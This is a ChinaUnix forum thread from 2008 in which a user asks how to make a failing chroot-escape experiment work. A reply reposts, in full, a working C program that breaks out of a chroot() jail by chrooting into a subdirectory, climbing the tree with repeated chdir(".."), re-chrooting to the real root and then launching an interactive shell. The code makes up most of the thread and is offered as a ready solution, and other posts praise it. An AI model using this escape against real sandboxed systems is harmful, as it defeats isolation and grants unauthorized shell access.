免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12
最近访问板块 发新帖
楼主: c_acceleration
打印 上一主题 下一主题

让我失望的程序,我该怎么修改? [复制链接]

论坛徽章:
0
11 [报告]
发表于 2008-05-12 12:29 |只看该作者
有什么好的方法么?我参考资料的,可是运行实验不成功。。

论坛徽章:
0
12 [报告]
发表于 2008-05-12 13:05 |只看该作者
chroot要是能用常规方法“突破”,那还叫chroot吗???

论坛徽章:
0
13 [报告]
发表于 2008-05-12 14:22 |只看该作者

ZZ突破chroot

From http://www.penguinsecurity.net/wiki/index.php?title=How_to_break_out_of_a_chroot()_jail


#include <stdio.h>  
#include <errno.h>  
#include <fcntl.h>  
#include <string.h>  
#include <unistd.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
&nbsp;&nbsp;&nbsp;
/*  
** You should set NEED_FCHDIR to 1 if the chroot() on your  
** system changes the working directory of the calling  
** process to the same directory as the process was chroot()ed  
** to.  
**  
** It is known that you do not need to set this value if you  
** running on Solaris 2.7 and below.  
**  
*/
  
#define NEED_FCHDIR 0  
&nbsp;&nbsp;&nbsp;
#define TEMP_DIR "waterbuffalo"  
&nbsp;&nbsp;&nbsp;
/* Break out of a chroot() environment in C */  
&nbsp;&nbsp;&nbsp;
int main() {  
&nbsp;&nbsp;int x;            /* Used to move up a directory tree */  
&nbsp;&nbsp;int done=0;       /* Are we done yet ? */  
#ifdef NEED_FCHDIR  
&nbsp;&nbsp;int dir_fd;       /* File descriptor to directory */  
#endif  
&nbsp;&nbsp;struct stat sbuf; /* The stat() buffer */  
&nbsp;&nbsp;&nbsp;
/*  
** First we create the temporary directory if it doesn't exist  
*/
  
&nbsp;&nbsp;if (stat(TEMP_DIR,&sbuf)<0) {  
&nbsp;&nbsp;&nbsp;&nbsp;if (errno==ENOENT) {  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (mkdir(TEMP_DIR,0755)<0) {  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strerror(errno));  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}  
&nbsp;&nbsp;&nbsp;&nbsp;} else {  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strerror(errno));  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;&nbsp;&nbsp;}  
&nbsp;&nbsp;} else if (!S_ISDIR(sbuf.st_mode)) {  
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);  
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;}  
&nbsp;&nbsp;&nbsp;
#ifdef NEED_FCHDIR  
/*  
** Now we open the current working directory  
**  
** Note: Only required if chroot() changes the calling program's  
**       working directory to the directory given to chroot().  
**  
*/
  
&nbsp;&nbsp;if ((dir_fd=open(".",O_RDONLY))<0) {  
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Failed to open . for reading - %s\n",  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strerror(errno));  
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;}  
#endif  
&nbsp;&nbsp;&nbsp;
/*  
** Next we chroot() to the temporary directory  
*/
  
&nbsp;&nbsp;if (chroot(TEMP_DIR)<0) {  
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strerror(errno));  
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;}  
&nbsp;&nbsp;&nbsp;
#ifdef NEED_FCHDIR  
/*  
** Partially break out of the chroot by doing an fchdir()  
**  
** This only partially breaks out of the chroot() since whilst  
** our current working directory is outside of the chroot() jail,  
** our root directory is still within it. Thus anything which refers  
** to "/" will refer to files under the chroot() point.  
**  
** Note: Only required if chroot() changes the calling program's  
**       working directory to the directory given to chroot().  
**  
*/
  
&nbsp;&nbsp;if (fchdir(dir_fd)<0) {  
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Failed to fchdir - %s\n",  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strerror(errno));  
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;}  
&nbsp;&nbsp;close(dir_fd);  
#endif  
&nbsp;&nbsp;&nbsp;
/*  
** Completely break out of the chroot by recursing up the directory  
** tree and doing a chroot to the current working directory (which will  
** be the real "/" at that point). We just do a chdir(".." lots of  
** times (1024 times for luck . If we hit the real root directory before  
** we have finished the loop below it doesn't matter as .. in the root  
** directory is the same as . in the root.  
**  
** We do the final break out by doing a chroot("." which sets the root  
** directory to the current working directory - at this point the real  
** root directory.  
*/
  
&nbsp;&nbsp;for(x=0;x<1024;x++) {  
&nbsp;&nbsp;&nbsp;&nbsp;chdir("..");  
&nbsp;&nbsp;}  
&nbsp;&nbsp;chroot(".");  
&nbsp;&nbsp;&nbsp;
/*  
** We're finally out - so exec a shell in interactive mode  
*/
  
&nbsp;&nbsp;if (execl("/bin/sh","-i",NULL)<0) {  
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,"Failed to exec - %s\n",strerror(errno));  
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);  
&nbsp;&nbsp;}  
}  


[ 本帖最后由 Missex 于 2008-5-12 14:24 编辑 ]

评分

参与人数 1可用积分 +5 收起 理由
JohnBull + 5 我很赞同

查看全部评分

论坛徽章:
0
14 [报告]
发表于 2008-05-12 16:07 |只看该作者
楼上给出了解答,两貼合并。

论坛徽章:
0
15 [报告]
发表于 2008-05-12 17:45 |只看该作者
谢谢,我看看
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP